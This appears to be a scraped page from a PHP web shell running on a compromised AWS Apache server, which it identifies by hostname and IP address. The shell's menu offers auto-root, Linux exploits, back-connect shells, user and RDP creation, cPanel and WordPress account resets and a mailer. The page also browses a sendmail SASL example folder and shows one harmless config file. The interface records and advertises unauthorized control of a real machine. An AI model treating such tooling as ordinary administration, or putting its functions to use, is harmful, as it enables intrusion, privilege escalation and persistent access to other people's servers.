Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.17.74.222
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
sendmail /
examples /
sasl /
[ HOME SHELL ]
Name
Size
Permission
Action
Sendmail.conf.1
658
B
-rw-r--r--
Sendmail.conf.2
885
B
-rw-r--r--
sasl.m4
3.01
KB
-rw-r--r--
saslpasswd.conf.1
589
B
-rw-r--r--
saslpasswd.conf.2
701
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Sendmail.conf.1
#Currently configurable parameters: #- srvtab (for KERBEROS_V4): [/etc/srvtab] path # where to find the srvtab # #- pwcheck_method: [PAM] one of {PAM, kerberos_v4, passwd, shadow, sasldb} # how to check plaintext passwords. # #- auto_transition: [false] # if true, automatically add secrets to the secret database when # PLAIN or check_password is used, so in the future the user can # use the more secure mechanisms. # #*** For a more detailed guide on configuring SASL, please look at #doc/sysadmin.html. # auto_transition: true #pwcheck_method: sasldb #pwcheck_method: saslauthd #pwcheck_method: PAM pwcheck_method: PAM
Close